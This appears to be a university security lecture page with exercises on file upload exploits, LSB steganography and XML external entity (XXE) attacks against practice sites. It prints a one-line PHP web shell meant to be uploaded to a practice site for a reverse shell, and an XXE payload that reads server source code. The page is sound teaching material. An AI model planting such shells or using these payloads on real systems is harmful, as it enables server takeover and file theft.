Don't like this style? Click here to change it! blue.css

LOGIN:
Welcome .... Click here to logout

Cool Stuff Packed In

7 lectures left this semester and here are things I would regret NOT teaching you but don't really want to spend a whole lecture on.

File Upload Exploits

So as a concept, if you are able to share a photo with a server it will land somewhere. If you can know where it learns does that net you something?

Get the flag and pop a reverse shell at: https://fuecakes.herokuapp.com/

      
        <?php
          echo system($_GET["cmd"]);
        ?>

LSB Steganography

This pops up a lot in CTFs, mostly because it's a fun concept to wrap your head around. But in the context of a kill chain this would be expected in the exfiltration side of house, but what do I know, I just like cool puzzles.

The big idea is this: a pixel typically contains 1, 3 or 4 values: White or Red, Green, Blue or Red, Green, Blue, Alpha each stored as one byte 0-255.

So imagine you have an image on the internet which is a big red square: (255, 0, 0) for every pixel:

Would you be able to visually distinguish it from (254, 0, 0)?

If we don't think it's detectable we could hide messages in those insignificant bits that would be hard to notice:

Find the flag in the following version:

If you'd like here is the python for how I made those 3 images, also just a useful thing to be able to do:

Some other concepts near LSB:

Take this image (leo.png) over to https://georgeom.net/StegOnline/upload and upload it. Then click the LSB-Half button.

While you're add it inspect the bit planes of the flaghere.png to see artifacting.

XXE: eXtensible XML Entities

OK I want to introduce: https://websec.fr/ a great collection of direct websec exploits.

This one is level 12.

It is more common than it seems. If you can upload any kind of XML (which included HTML) and a security setting isn't turned on, you can craft a malicious payload that loads external files. From that you can comb around looking for cool stuff. (You can also, occasionally, import external URLs allowing command and control!)

Let's look at the following writeup: https://medium.com/bugbountywriteup/devoops-an-xml-external-entity-xxe-hackthebox-walkthrough-fb5ba03aaaa2

Now here are some sample payloads:

Payload All The Things

Here is some friendly docs (not exploit related) that explain how the XML declarations see themselves.

OK let's go. Try websec.fr problem 12. Here are some hints: Use SimpleXMLElement as the class name and number values (0,1,2,...) for param 2. For param 1, try something like: >!DOCTYPE foo [>!ENTITY hi "yoyoyo"< ] < >foo<&hi;>/foo< (which integer works for this payload?). Now replace >!ENTITY hi "yoyoyo"< with something like >!ENTITY hi SYSTEM "php://filter/convert.base64-encode/resource=index.php"< and find an integer value that shows the source code (in base64). Hunt for a payload that solves the problem.

Here is a writeup that uses BOTH exploits to win.